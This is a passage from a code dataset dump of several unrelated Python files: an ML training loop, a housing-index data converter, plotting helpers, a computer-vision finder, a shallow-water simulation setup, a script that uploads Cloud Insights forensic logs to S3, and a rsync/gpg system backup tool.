loss = loss_function(output, label)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if index%10 == 0:\r\n print(\"case \", index, \", current loss = %0.5f\" % loss.item())\r\n torch.save(enc, \"enc1.pkl\")\r\n torch.save(cla, \"cla1.pkl\")\r\n'''\r\nbase = \"gen_image/\"\r\n\r\nSTART = 108\r\n\r\nEND = 129 # 3982\r\nNUM_EPOCH = 1200\r\nlearning_rate = 0.0003\r\n\r\nenc = fontEncoder().cuda()\r\ncla = classifier().cuda()\r\n\r\nloss_function = nn.CrossEntropyLoss().cuda()\r\noptimizer = torch.optim.Adam(list(enc.parameters()) + list(cla.parameters()), lr=learning_rate)\r\n\r\n# loss_history = [0]*3874\r\n# max_loss = [0]*3874\r\nprint(\"reading data.\")\r\ndata = []\r\nlabels = []\r\nfor i in range(START, END):\r\n\r\n pics = getData(base, i)\r\n label = np.zeros(pics.shape[0], dtype=np.int32)\r\n label[:] = i - START\r\n\r\n data.append(pics)\r\n labels.append(label)\r\n\r\nfor epoch in range(NUM_EPOCH):\r\n \r\n print(\"current epoch: \", epoch)\r\n\r\n for i in range(START, START + 20):\r\n\r\n optimizer.zero_grad()\r\n\r\n pic = data[i - START]\r\n label = labels[i - START]\r\n\r\n pic = Variable(torch.Tensor(pic)).cuda()\r\n label = Variable(torch.Tensor(label)).cuda().long()\r\n\r\n embedding = enc(pic)\r\n output = cla(embedding)\r\n\r\n loss = loss_function(output, label)\r\n loss.backward()\r\n optimizer.step()\r\n\r\n if i%5 == 0:\r\n print(\"case \", i, \", current loss = %0.5f\" % loss.item())\r\n torch.save(enc, \"enc1.pkl\")\r\n torch.save(cla, \"cla1.pkl\")\r\n'''","sub_path":"font_extractor.py","file_name":"font_extractor.py","file_ext":"py","file_size_in_byte":4088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"284535653","text":"import os\nimport csv\nimport urllib\nimport shutil\nimport dataconverters\n\nurl_national = 'http://us.spindices.com/documents/additionalinfo/20131126/64929_csnational-values-1126.xls'\nurl_cities = 'http://us.spindices.com/documents/additionalinfo/20131126/64929_cshomeprice-history-1126.xls'\nxls_national = 'tmp/national.xls'\nxls_cities = 'tmp/cities.xls'\ntmp_national = 'tmp/national.csv'\ntmp_cities = 'tmp/cities.csv'\nout_national_year = 'data/national-year.csv'\nout_national_quarter = 'data/national-quarter.csv'\nout_cities = 'data/cities-month.csv'\n\ndef setup():\n if not os.path.exists('tmp'):\n os.makedirs('tmp')\n if not os.path.exists('data'):\n os.makedirs('data')\n\ndef retrieve():\n urllib.urlretrieve(url_national, xls_national)\n urllib.urlretrieve(url_cities, xls_cities)\n\ndef xls_to_csv():\n dataconverters.dataconvert(xls_national, tmp_national)\n dataconverters.dataconvert(xls_cities, tmp_cities, guess_types=False)\n\ndef process_national():\n fo = open(tmp_national)\n reader = csv.DictReader(fo)\n foout = open(out_national_year, 'w')\n writer = csv.writer(foout)\n writer.writerow(['Year', 'Composite-US'])\n vals = []\n for row in reader:\n year = row['YEAR'][:4]\n quarter = row['QTR'][1]\n vals.append(float(row['COMPOSITE-US']))\n if quarter == '4':\n val = round(sum(vals) / 4, 2)\n vals = []\n writer.writerow([year, val])\n\ndef process_national_q():\n fo = open(tmp_national)\n reader = csv.DictReader(fo)\n foout = open(out_national_quarter, 'w')\n writer = csv.writer(foout)\n writer.writerow(['Date', 'Composite-US'])\n for row in reader:\n year = row['YEAR'][:4]\n date = '%s-%02d-01' % (year, (int(row['QTR'][1])-1)*3+1)\n writer.writerow([date, row['COMPOSITE-US']])\n\ndef process_cities():\n indata = open(tmp_cities).read()\n # fix time in dataconvert which adds 00:00:00\n indata = indata.replace(' 00:00:00', '')\n indata = indata.replace('column_1', 'Date')\n indata = indata.split('\\n')\n del indata[1]\n indata = '\\n'.join(indata)\n open(out_cities, 'w').write(indata)\n\ndef process():\n setup()\n retrieve()\n xls_to_csv()\n process_national()\n process_national_q()\n process_cities()\n\nif __name__ == '__main__':\n process()\n\n","sub_path":"scripts/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"297413241","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nLine operations.\nAll operations have return value for post processing.\n\n@author: CHEN Yongxin\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef horizontalSegmentLines(x, y):\n \"\"\" Returns horizontal segment lines' data\n _________ \n |\n e.g. _____ | ...\n | |\n |_____| \n args:\n x: x coordinate values with (m+1) values\n y: y coordinate values with (m ) values\n returns:\n X, Y: segment lines' coordinate with 2*m values\"\"\"\n m = len(y)\n X = np.zeros(2*m)\n Y = np.zeros(2*m)\n X[1::2] = x[1:]\n X[2::2] = X[1:-1:2]\n X[0] = x[0]\n Y[1::2] = y\n Y[ ::2] = Y[1::2]\n return X, Y\n \ndef horizontalStartLines(x, y):\n \"\"\" Returns horizontal start lines' data\n args:\n x: x coordinate values with m values\n y: y coordinate values with m values\n returns:\n X, Y: segment lines' coordinate with 2*m-1 values\"\"\"\n m = len(x)\n X = np.zeros(2*m-1)\n Y = np.zeros(2*m-1)\n X[ ::2] = x\n X[1::2] = X[2::2]\n Y[1::2] = y[ :-1]\n Y[ ::2] = y\n return X, Y\n \ndef verticalStartLines(x, y):\n \"\"\" Returns vertical start lines' data\n args:\n x: x coordinate values with m values\n y: y coordinate values with m values\n returns:\n X, Y: segment lines' coordinate with 2*m-1 values\"\"\"\n m = len(x)\n X = np.zeros(2*m-1)\n Y = np.zeros(2*m-1)\n X[ ::2] = x\n X[1::2] = X[ :-1:2]\n Y[ ::2] = y\n Y[1::2] = y[1:]\n return X, Y\n \ndef verticalLines(mini, maxi, style, x, plot=False):\n \"\"\" Plots vertical lines \n args:\n mini : minimum value\n maxi : maximum value\n style: plot style\n *x : x coordinate of vertical lines \"\"\"\n if plot:\n for i in x:\n plt.plot([i, i], [mini, maxi], style)\n n = len(x)\n '''return value: vl\n vl = [x1, x2, y1, y2 ...]'''\n vl = np.zeros((n, 4))\n for i in range(n):\n vl[i, :2] = x[i]\n vl[i, 2 ] = mini\n vl[i, 3 ] = maxi\n return vl\n \ndef horizontalLines(mini, maxi, style, y, plot=False):\n \"\"\" Plots horizontal lines \n args:\n mini : minimum value\n maxi : maximum value\n style: plot style\n *y : y coordinate of horizontal lines \"\"\"\n if plot:\n for i in y:\n plt.plot([mini, maxi], [i, i], style)\n n = len(y)\n '''return value: hl\n hl = [x1, x2, y1, y2 ...]'''\n hl = np.zeros((n, 4))\n for i in range(n):\n hl[i, 0 ] = mini \n hl[i, 1 ] = maxi\n hl[i, 3:] = y[i]\n return hl\n\ndef grid(xmin, xmax, ymin, ymax, x, y, plot=False, stylex='k', styley='k'):\n \"\"\"Returns and plots horizontal and vertical lines, i.e. grid\n args:\n x, y: x and y lines coordinates\"\"\"\n hl = horizontalLines(ymin, ymax, styley, y, plot=plot)\n vl = verticalLines(xmin, xmax, stylex, x, plot=plot)\n return np.concatenate((hl, vl), axis=0)","sub_path":"Numetica/lines.py","file_name":"lines.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"38497254","text":"import numpy as np\n\nfrom gbvision.constants.system import EMPTY_PIPELINE\nfrom gbvision.models.contours import find_contours, FilterContours, sort_contours, contours_to_rotated_rects_sorted\nfrom gbvision.models.shapes import filter_inner_rotated_rects\nfrom .object_finder import ObjectFinder\n\n\nclass RotatedRectFinder(ObjectFinder):\n \"\"\"\n finds a rectangular object, but rotated. recommended to use when you know the shape isn't parallel to the camera\n \"\"\"\n\n def __init__(self, threshold_func, game_object, area_scalar=1.0, contour_min_area=3.0):\n \"\"\"\n\n :param area_scalar: optional, a scalar to multiply the area by, for fine tuning of the function's output\n :param contour_min_area: the minimal area of a contour, used for FilterContours, default is 0 (no area limit)\n \"\"\"\n ObjectFinder.__init__(self, threshold_func, game_object)\n self._full_pipeline = (EMPTY_PIPELINE +\n threshold_func +\n find_contours +\n FilterContours(min_area=contour_min_area) +\n sort_contours +\n contours_to_rotated_rects_sorted +\n filter_inner_rotated_rects)\n self.area_scalar = area_scalar\n\n def __call__(self, frame, camera):\n rects = self._full_pipeline(frame)\n return list(map(\n lambda rect: self.game_object.location_by_params(camera,\n self.area_scalar * np.sqrt(rect[1][0] * rect[1][1]),\n rect[0]), rects))","sub_path":"gbvision/finders/rotated_rect_finder.py","file_name":"rotated_rect_finder.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"50990021","text":"from __future__ import division\nfrom builtins import object\nfrom past.utils import old_div\nfrom proteus import *\nfrom proteus.default_p import *\nfrom proteus.mprans import SW2DCV\nfrom proteus.mprans import GN_SW2DCV\nfrom proteus.Domain import RectangularDomain\nimport numpy as np\nfrom proteus import (Domain, Context, MeshTools as mt)\nfrom proteus.Profiling import logEvent\nimport proteus.SWFlows.SWFlowProblem as SWFlowProblem\n\n\n\"\"\"\nThis test uses the definition of a solitary wave from eqn 31\nin the the paper 'A rapid numerical method for solving Serre Green Naghdi\nequations describing long free surface gravity waves' by\nFavrie and Gavrilyuk.\n\"\"\"\n\n# *************************** #\n# ***** GENERAL OPTIONS ***** #\n# *************************** #\n\nopts = Context.Options([\n ('sw_model', 1, \"sw_model = {0,1} for {SWEs,DSWEs}\"),\n (\"final_time\", 4.0, \"Final time for simulation\"),\n (\"dt_output\", 0.1, \"Time interval to output solution\"),\n (\"cfl\", 0.25, \"Desired CFL restriction\"),\n (\"refinement\", 4, \"Refinement level\")\n])\n\n###################\n# DOMAIN AND MESH #\n###################\nL = (10.0, 1.0)\nX_coords = (0.0, 10.0) # this is domain, used in BCs\ndomain = RectangularDomain(L=L, x=[0, 0, 0])\n\n# CREATE REFINEMENT #\nrefinement = opts.refinement\nnnx0 = 6\nnnx = (nnx0 - 1) * (2**refinement) + 1\nnny = old_div((nnx - 1), 10) + 1\nhe = old_div(L[0], float(nnx - 1))\ntriangleOptions = \"pAq30Dena%f\" % (0.5 * he**2,)\n\n###################################\n# SOLITARY WAVE FUCTIONS AND BATH #\n###################################\ng = 9.81\nh1 = .10\nh2 = .11\nx0 = 2.0 # initial location of solitary wave\n# solitary wave celerity and width\nc = np.sqrt(g * h2)\nr = np.sqrt(old_div(3.0 * (h2 - h1), 4 * h2 * h1**2))\n\ndef solitary_wave(x, t):\n phase = x - c * t - x0\n return h1 + (h2 - h1) * old_div(1.0, np.cosh(r * phase)**2)\n\n\ndef u(x, t):\n h = solitary_wave(x,t)\n return c * (1.0 - old_div(h1, h))\n\n\ndef bathymetry_function(X):\n x = X[0]\n # then return vector of zeros\n return x * 0.0\n\n\n###################################\n# FOR ANALYTICAL SOLUTIONS #\n###################################\nclass Zero(object):\n def uOfXT(self, x, t):\n return 0.0\n\n\nclass water_height_at_tfinal(object):\n def uOfXT(self, X, t):\n return solitary_wave(X[0], opts.final_time)\n\n\n##############################\n# INITIAL CONDITIONS #\n##############################\n\n\nclass water_height_at_t0(object):\n def uOfXT(self, X, t):\n return solitary_wave(X[0], 0.0)\n\n\nclass x_mom_at_t0(object):\n def uOfXT(self, X, t):\n h = solitary_wave(X[0], 0.0)\n return h * u(X[0], 0.0)\n\n\nclass y_mom_at_t0(object):\n def uOfXT(self, X, t):\n h = water_height_at_t0().uOfXT(X, t)\n return 0. * h\n\n\n\"\"\"\nheta and hw are needed for the modified green naghdi equations.\nNote that the BCs for the heta and hw should be same as h.\nFor more details see: 'Robust explicit relaxation techinque for solving\nthe Green-Naghdi equations' by Guermond, Popov, Tovar, Kees.\nJCP 2019\n\"\"\"\n\n\nclass heta_at_t0(object):\n def uOfXT(self, X, t):\n h = water_height_at_t0().uOfXT(X, 0.0)\n return h**2\n\n\nclass hw_at_t0(object):\n def uOfXT(self, X, t):\n # since there is no bathymetry, waterHeight = htilde\n # hw = -waterHeight^2 * div(vel)\n # = -h^2 * (c * h1 * hTildePrime/hTilde^2) = -c * h1 * hTildePrime\n x = X[0]\n phase = x - c * t - x0\n sechSqd = old_div(1.0, np.cosh(r * phase)**2)\n hprime = -2.0 * (h2 - h1) * r * sechSqd * np.tanh(r * phase)\n hw = -c * h1 * hprime\n return hw\n\n\n###############################\n# BOUNDARY CONDITIONS #\n###############################\n\n\ndef x_mom_DBC(X, flag):\n if X[0] == X_coords[0] or X[0] == X_coords[1]:\n return lambda x, t: 0.0\n\n\n# ********************************** #\n# ***** Create mySWFlowProblem ***** #\n# ********************************** #\n\n\noutputStepping = SWFlowProblem.OutputStepping(\n opts.final_time, dt_output=opts.dt_output)\ninitialConditions = {'water_height': water_height_at_t0(),\n 'x_mom': x_mom_at_t0(),\n 'y_mom': y_mom_at_t0(),\n 'h_times_eta': heta_at_t0(),\n 'h_times_w': hw_at_t0()}\nboundaryConditions = {'water_height': lambda x, flag: None,\n 'x_mom': x_mom_DBC,\n 'y_mom': lambda x, flag: lambda x, t: 0.0,\n 'h_times_eta': lambda x, flag: None,\n 'h_times_w': lambda x, flag: None}\nanalytical_Solution = {'h_exact': water_height_at_tfinal(),\n 'hu_exact': Zero(),\n 'hv_exact': Zero(),\n 'heta_exact': Zero(),\n 'hw_exact': Zero()}\n\nmySWFlowProblem = SWFlowProblem.SWFlowProblem(sw_model=opts.sw_model,\n cfl=0.25,\n outputStepping=outputStepping,\n structured=True,\n he=he,\n nnx=nnx,\n nny=nny,\n domain=domain,\n initialConditions=initialConditions,\n boundaryConditions=boundaryConditions,\n bathymetry=bathymetry_function,\n analyticalSolution=analytical_Solution)\nmySWFlowProblem.physical_parameters['LINEAR_FRICTION'] = 0\nmySWFlowProblem.physical_parameters['mannings'] = 0.0\n","sub_path":"proteus/SWFlows/tests/solitary_wave/SWFlow.py","file_name":"SWFlow.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"14029204","text":"import os\nfrom urllib import request, parse\nimport json\nfrom pprint import pprint\nimport datetime, time, calendar\nfrom dateutil.relativedelta import relativedelta\nimport pandas\nimport boto3\n\n### APIリクエスト条件 ###\nurl = os.environ['CLOUD_SECURE_URL']\ntoken = os.environ['CLOUD_SECURE_TOKEN']\nsvm = os.environ['GET_DEVICE_NAME']\n\n### データ一時保存先 ###\noutput_path = '/tmp/'\nupload_bucket = 'myuichi-python-upload-test-bucket'\n\n### 検索レンジ生成 ###\ndef get_search_time(date):\n\tlast = date - relativedelta(months=1)\n\tbegin_date = datetime.datetime(last.year, last.month, 1)\n\tbegin_date = int(time.mktime(begin_date.timetuple()) * 1000)\n\tend_date = datetime.datetime(date.year, date.month, 1)\n\tend_date = int(time.mktime(end_date.timetuple()) * 1000)\n\t### 月末日の取得 ###\n\t# last_end_date = datetime.datetime(last.year, last.month, calendar.monthrange(last.year, last.month)[1])\n\t# last_end_date = int(time.mktime(last_end_date.timetuple()) * 1000)\n\treturn begin_date, end_date\n\n### アクセスログ取得 ###\ndef get_forensic_log(svm, token, url, output_path):\n\t### S3 オブジェクト情報取得 ###\n\ts3 = boto3.resource('s3')\n\tbucket = s3.Bucket(upload_bucket)\n\n\t### Get Request クエリストリング & ヘッダ 定義 ###\n\ttoday = datetime.datetime.utcnow()\n\tbegin_date, end_date = get_search_time(today)\n\tparam = {\n\t\t'deviceName': svm,\n\t\t'fromTime': begin_date,\n\t\t'toTime': end_date\n\t}\n\theaders = {\n\t\t'x-cloudinsights-apikey': token\n\t}\n\n\t### クエリストリングのParse処理 ###\n\tquery_strings = parse.urlencode(param)\n\tget_url = url + query_strings\n\n\t### Get Request 生成・実行 ###\n\treq = request.Request(get_url, headers=headers)\n\twith request.urlopen(req) as res:\n\t\tbody = json.loads(res.read())\n\t\toutput_body = pandas.json_normalize(body['results'])\n\t\toutput_file = str(today.year) + str(today.month) + '_' + svm + '_' + 'output.csv'\n\t\tattachment = output_path + output_file\n\t\toutput_body.to_csv(attachment, encoding='utf-8')\n\t\tbucket.upload_file(attachment, output_file)\n\t\n\treturn attachment\n\n### メイン処理 ###\ndef main():\n\tattachment = get_forensic_log(svm, token, url, output_path)\n\tprint('Upload: ' + attachment)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"src/cloud-insights/get-forensic-and-upload.py","file_name":"get-forensic-and-upload.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"405767242","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n#\n# File: Backuppa.py\n# Auth: © 2017 Mattia Oss \n# Date: Sun, 01 Oct 2017 23:16:14 \n# Description: minimal backup system.\n\n##################################################################\n\nBATCH = DEBUG = VERBOSE = False\n\n##################################################################\n\nimport sys, os, os.path as op, subprocess, datetime as dt, argparse, yaml, shlex, grp\n\ndef pstr(s):\n print('--------------[ %s ]--------------' % s)\n\nclass Backuppa:\n\n def __init__(self, baktype, key, name='localhost', backdir='.', rsyncfile='', tardir='', outfile='', group='', uploaddir='', mysql=False, mysqldbs=[], dpkg=False):\n # self.type = type of backup (daily, weekly)\n self.type = ''\n # a man needs a name\n self.name = name\n # self.backdir = main backup dir\n self.backdir = ''\n # self.rsyncfile = rsync file to use\n self.rsyncfile = ''\n # self.tardir = where to put backup files\n self.tardir = ''\n # self.outfile = output file (overwrites self.tardir)\n self.outfile = ''\n # group for standard users (do nothing if empty)\n self.group = group\n # self.uploaddir = upload directory\n self.uploaddir = ''\n # save list of installed packages\n self.dpkg = dpkg\n # dump mysql?\n self.mysql = mysql\n # mysql databases\n self.mysqldbs = mysqldbs\n # use this key to encript\n self.key = key\n\n self.setType(baktype)\n self.setBackDir(backdir)\n self.setRsyncFile(rsyncfile)\n self.setTarDir(tardir)\n self.setOutFile(outfile)\n self.setUploadDir(uploaddir)\n\n if DEBUG:\n print(self.__dict__)\n\n def __str__(self):\n s = \"\"\"\\\nbackup type\\t: {0[type]}\\n\\\nname\\t\\t: {0[name]}\\n\\\nbackup dir\\t: {0[backdir]}\\n\\\nrsync file\\t: {0[rsyncfile]}\\n\\\ntarball dir\\t: {0[tardir]}\\n\\\noutput file\\t: {0[outfile]}\\n\\\ngroup\\t\\t: {0[group]}\\n\\\nupload dir\\t: {0[uploaddir]}\\n\\\nSave dpkg list\\t: {0[dpkg]}\\n\\\ndump mysql\\t: {0[mysql]}\\n\\\nmysqldbs\\t: {0[mysqldbs]}\\n\\\nGPG key\\t\\t: {0[key]}\\\n\"\"\".format(self.__dict__)\n return s\n\n def setType(self, t):\n \"\"\" Set type of backup \"\"\"\n types = ['daily', 'weekly', 'monthly']\n if t in types:\n self.type = t\n if DEBUG:\n print('self.type =', self.type)\n else:\n print('Error: backup type {} not supported. Valid choices: {}'.format(t, types))\n sys.exit(1)\n\n def setName(self, name):\n \"\"\" Name the backup \"\"\"\n self.name = name\n\n def setBackDir(self, d):\n \"\"\" Set backup directory \"\"\"\n p = op.abspath(d)\n if op.isdir(p):\n self.backdir = p\n else:\n print('Not a valid directory: ', d)\n sys.exit(1)\n\n def setRsyncFile(self, f):\n \"\"\" Set rsync file \"\"\"\n # self.rsyncfile = op.abspath(f)\n if not f:\n if DEBUG:\n print('rsync file empty =', f)\n s = self.name +'.' +self.type +'.rsync'\n f = op.join(self.backdir, s)\n p = op.abspath(f)\n if op.isfile(p):\n self.rsyncfile = p\n else:\n print('Not a valid file: ', f)\n sys.exit(1)\n\n def setTarDir(self, td):\n \"\"\" Set directory to store tarballs \"\"\"\n if not td:\n if DEBUG:\n print('tardir empty =', td)\n td = op.join(self.backdir, 'tarballs', self.name)\n p = op.abspath(td)\n if op.isfile(p):\n print('Error: {} already exists bit it\\'s a file', p)\n sys.exit(1)\n else:\n os.makedirs(p, exist_ok=True)\n self.tardir = p\n\n def setOutFile(self, of=''):\n \"\"\" Set output/target file \"\"\"\n if of:\n self.outfile = op.abspath(of)\n else:\n # no outfile --> default one\n d = dt.datetime.now()\n if self.type == 'daily':\n time = d.strftime(\"%d\")\n out = self.name +'.daily-{}.tar.xz.gpg'.format(time)\n elif self.type == 'weekly':\n time = d.strftime(\"%W\")\n out = self.name +'.weekly-{}.tar.xz.gpg'.format(time)\n elif self.type == 'monthly':\n # time = d.strftime(\"%B\").lower()\n time = d.strftime(\"%m\")\n out = self.name +'.monthly-{}.tar.xz.gpg'.format(time)\n else:\n print('Error: backup type {} not supported. Valid choices: {}'.format(self.type, types))\n sys.exit(1)\n\n self.outfile = op.join(self.tardir, out)\n\n def setUploadDir(self, ud):\n \"\"\" Set directory to upload tarballs \"\"\"\n if ud:\n p = op.abspath(ud)\n if op.isdir(p):\n self.uploaddir = p\n else:\n print('{} is not a valid directory.'.format(p))\n sys.exit(1)\n else:\n if DEBUG:\n print('upload dir empty =', ud)\n self.uploaddir = ''\n\n def rsync(self):\n \"\"\" Backup the files \"\"\"\n # s = '/usr/bin/rsync --archive --xattrs --verbose --delete --delete-excluded --human-readable --xattrs --partial --stats --filter={} / {}'.format(shlex.quote('\\\"merge {}\\\"'.format(self.rsyncfile)), op.join(self.backdir, self.name))\n s = '/usr/bin/rsync --archive --xattrs --verbose --delete --delete-excluded --human-readable --xattrs --partial --stats --filter={} / {}'.format(shlex.quote('merge {}'.format(self.rsyncfile)), op.join(self.backdir, self.name))\n cmd = shlex.split(s)\n out = self.exe(cmd)\n if DEBUG or VERBOSE:\n print('out= ', out)\n\n def save_dpkg(self):\n \"\"\" Save packages list \"\"\"\n if self.dpkg:\n s = '/usr/bin/dpkg --get-selections'\n cmd = shlex.split(s)\n outfile = op.join(self.backdir, self.name, 'dpkg.list')\n if DEBUG:\n print('outfile =', outfile)\n with open(outfile, 'w') as f:\n f.write(self.exe(cmd))\n\n def dump_mysql(self):\n \"\"\" Dump MYSQL databases; \"\"\"\n if self.mysql:\n # cmd = ['/usr/bin/mysqldump', '--all-databases']\n # dbs = ['mailserver','owncloud','phpmyadmin','roundcube','wpdb']\n for db in self.mysqldbs:\n cmd = ['/usr/bin/mysqldump', db]\n # outfile = /root/backuppa/backupdir/iperione/my.sql\n outfile = op.join(self.backdir, self.name, db +'.sql')\n if DEBUG:\n print('outfile =', outfile)\n with open(outfile, 'w') as f:\n print('Dumping db:', db)\n f.write(self.exe(cmd))\n\n def compress(self):\n \"\"\" Compress the backup \"\"\"\n # tar --create --sparse --xz --directory=$bkp $bkp/$host| gpg --batch --yes --verbose -z 0 --encrypt --recipient $rec --output $outfile\n # s = '/bin/tar --create --sparse --xz --directory={} {}'.format(self.backdir, op.join(self.backdir, self.name))\n # s = '/bin/tar --create --sparse --xz --directory={} .'.format(op.join(self.backdir, self.name))\n s = '/bin/tar --create --sparse --xz --directory={} {}'.format(self.backdir, self.name)\n cmd_tar = shlex.split(s)\n try:\n if DEBUG:\n print('Running command:', s)\n tar = subprocess.Popen(cmd_tar, stdout = subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n except (OSError, subprocess.CalledProcessError):\n print('Error while executing:', s)\n sys.exit(1)\n \n s = '/usr/bin/gpg --batch --yes --verbose -z 0 --encrypt --recipient {} --output {}'.format(self.key, self.outfile)\n cmd_gpg = shlex.split(s)\n try:\n if DEBUG:\n print('Running command:', s)\n gpg = subprocess.Popen(cmd_gpg, stdin = tar.stdout, stdout = subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)\n except (OSError, subprocess.CalledProcessError):\n print('Error while executing:', s)\n sys.exit(1)\n\n tar.stdout.close()\n out, err = gpg.communicate()\n if tar.poll() or gpg.poll():\n print('Error while executing pipe:\\ntar_cmd = {}\\ngpg_cmd = {}'.format(' '.join(cmd_tar), ' '.join(cmd_gpg)))\n sys.exit(1)\n\n if DEBUG:\n print('out:\\n{}\\n\\nerr:\\n{}'.format(out, err))\n\n def chgrp(self):\n \"\"\" Change group \"\"\"\n gid = grp.getgrnam(self.group).gr_gid\n if DEBUG:\n print('gid =', gid)\n os.chown(self.outfile, uid=-1, gid=gid)\n\n def upload(self):\n \"\"\" Upload backups somewhere using rsync \"\"\"\n # cmd = ['/usr/bin/rsync', '-avz', self.conf['tardir'], self.conf['upload']]\n s = '/usr/bin/rsync -avz {} {}'.format(self.tardir, self.uploaddir)\n cmd = shlex.split(s)\n out = self.exe(cmd)\n if DEBUG:\n print('out= ', out)\n\n def do_bkp(self):\n \"\"\" Do the actual backup \"\"\"\n \n pstr('backupping the main files')\n self.rsync()\n if self.dpkg:\n pstr('saving packages list')\n self.save_dpkg()\n if self.mysql:\n pstr('dumping MYSQL databases')\n self.dump_mysql()\n pstr('compressing backup to ' +self.outfile)\n self.compress()\n if self.group:\n pstr('changing file to group ' +self.group)\n self.chgrp()\n if self.uploaddir:\n pstr('uploading to ' +self.uploaddir)\n self.upload()\n\n def exe(self, cmd):\n \"\"\" Execute a command \"\"\"\n try:\n if DEBUG:\n print('Running command:', ' '.join(cmd))\n # wait()\n # output = subprocess.check_output(cmd).decode(\"utf-8\")\n exe = subprocess.run(cmd, check=True, stdout=subprocess.PIPE, universal_newlines=True)\n except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as e:\n print('Error while executing:', ' '.join(cmd))\n print('Error details:\\n', e)\n sys.exit(1)\n return exe.stdout\n \n\ndef wait():\n \"\"\" Wait user input \"\"\"\n try:\n input('Press a key to continue...')\n except (KeyboardInterrupt, EOFError):\n print('\\nExiting gracefully.')\n sys.exit(0)\n\ndef load_config():\n \"\"\" Load configuration file \"\"\"\n if DEBUG:\n # files = ['~/.backuppa.debug', '~/.backuppa.test', '~/.backuppa.conf', '/etc/backuppa.conf', '/usr/local/etc/backuppa.conf']\n files = ['~/.backuppa.debug', '~/.backuppa.test']\n else:\n files = ['~/.backuppa.conf', '/etc/backuppa.conf', '/usr/local/etc/backuppa.conf']\n for f in files:\n try:\n with open(op.expanduser(f)) as ymlfile:\n if DEBUG or VERBOSE:\n print('Found config file: {0}'.format(f))\n return yaml.safe_load(ymlfile)\n except FileNotFoundError:\n pass\n\ndef config_ok(d):\n \"\"\" Check config \"\"\"\n # Mandatory objects\n keys = ['baktype', 'backdir', 'key']\n for k in keys:\n try:\n if not d[k]:\n print('Option `{}\\' must be set'.format(k))\n return False\n except KeyError:\n print('Option `{}\\' must be set'.format(k))\n return False\n\n else:\n return True\n\ndef get_args():\n \"\"\" Parse command line arguments \"\"\"\n parser = argparse.ArgumentParser('Backuppa', description = 'Just another script to backup your system.', epilog = 'Mandatory arguments to long options are mandatory for short options too.')\n parser.add_argument('baktype', choices = ['daily', 'd', 'weekly', 'w', 'monthly', 'm'], help='Specify the type of backup (daily/weekly)')\n parser.add_argument('-n', '--name', help='Specify the name of the backup (i.e. the host name)')\n parser.add_argument('-b', '--backdir', help='Specify the main backup directory')\n parser.add_argument('-r', '--rsyncfile', help='Specify the rsync include file')\n parser.add_argument('-t', '--tardir', help='Specify where to store the tarballs')\n parser.add_argument('-o', '--outfile', help='Specify the output file (overrides --tardir)')\n parser.add_argument('-g', '--group', help='Specify the group the backups will be changed to')\n parser.add_argument('-k', '--key', help='Specify the GPG key to use to encript the backups')\n parser.add_argument('-u', '--uploaddir', help='Upload the backups to this location')\n parser.add_argument('-c', '--batch', action='store_true', help='Don\\'t wait for confirmation (mandatory for cron jobs)')\n parser.add_argument('-v', '--verbose', action='store_true', help='Be more verbose')\n parser.add_argument('-d', '--debug', action='store_true', help='Enable debug mode')\n args = parser.parse_args()\n if args.baktype == 'd':\n args.baktype = 'daily'\n elif args.baktype == 'w':\n args.baktype = 'weekly'\n elif args.baktype == 'm':\n args.baktype = 'monthly'\n # args = parser.parse_known_args()\n # print(args.tarball)\n return args\n##################### start here #####################\n\n\n# get arguments\nd_args = vars(get_args())\n\nif d_args['debug']:\n DEBUG = True\n del d_args['debug']\n pstr('DEBUG MODE')\n\nif d_args['verbose']:\n VERBOSE = True\n del d_args['verbose']\n\nif d_args['batch']:\n BATCH = True\n del d_args['batch']\n\n# Load config file\nld_args = load_config()\n\nif DEBUG:\n print('d_args =', d_args)\n print('ld_args=', ld_args)\n\nif not ld_args:\n print('WARNING: config file not found/empty!')\n ld_args = {}\n\nfor k in d_args:\n if d_args[k]:\n ld_args[k] = d_args[k]\n\nif DEBUG:\n print('ld_args=', ld_args)\n\npstr('Checking needed objects')\nif config_ok(ld_args):\n # bkp = Backuppa(name='titan', backdir='/home/mattia/tmp/var', group='adm', uploaddir='', dpkg=True, mysql=False, typ='daily', mysqldbs=['mailserver', 'wdp'], key='AF1EA4ED683D9FAB0CCD296015CC763466B7DC32')\n bkp = Backuppa(**ld_args)\n # bkp = Backuppa()\nelse:\n print('Some mondatory options are missing. Exiting.')\n sys.exit(1)\n\npstr('SUMMARY')\nprint(bkp)\n\nif not BATCH:\n wait()\n\nbkp.do_bkp()\n","sub_path":"Backuppa.py","file_name":"Backuppa.py","file_ext":"py","file_size_in_byte":14683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
